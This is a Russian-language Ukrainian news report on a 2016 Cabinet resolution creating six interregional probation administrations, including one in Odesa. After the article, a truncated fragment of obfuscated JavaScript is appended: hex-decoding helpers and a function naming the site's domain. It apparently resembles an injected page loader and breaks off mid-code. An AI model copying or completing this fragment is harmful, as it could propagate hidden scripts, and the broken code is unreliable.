В Одессе создадут Южное межрегиональное управление по вопросам исполнения уголовных наказаний «фото»

В Одессе создадут Южное межрегиональное управление по вопросам исполнения уголовных наказаний

 

Безымянный

Как сообщает корреспондент Украинской Службы Информации со ссылкой на пресс-службу Киевского райсуда Одессы, об этом говорится в постановлении Кабмина №348 от 18 мая 2016 года.

Вместо ликвидированных территориальных органов,  будет создано 6 межрегиональных управлений по вопросам исполнения уголовных наказаний и пробации Министерства юстиции: Западное (Львов), Южное (Одесса), Юго-Восточное (Днепропетровск), Северо-Восточное (Харьков), Центральное (Киев) и Центрально-Западное (Винница) .

24 областных управления ликвидированной Государственной пенитенциарной службы будут  работать до образования межрегиональных управлений по вопросам исполнения уголовных наказаний и пробации Минюста, а потом войдут в них.

Отметим, что служба пробации предусматривает систему пробационных центров по надзору за осужденным и с возложением на него определенных обязательств и ограничений, но без изоляции от общества.

 

Как сообщала USIonline.com, в Одессе подписали Меморандум против пыток в тюрьмах.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e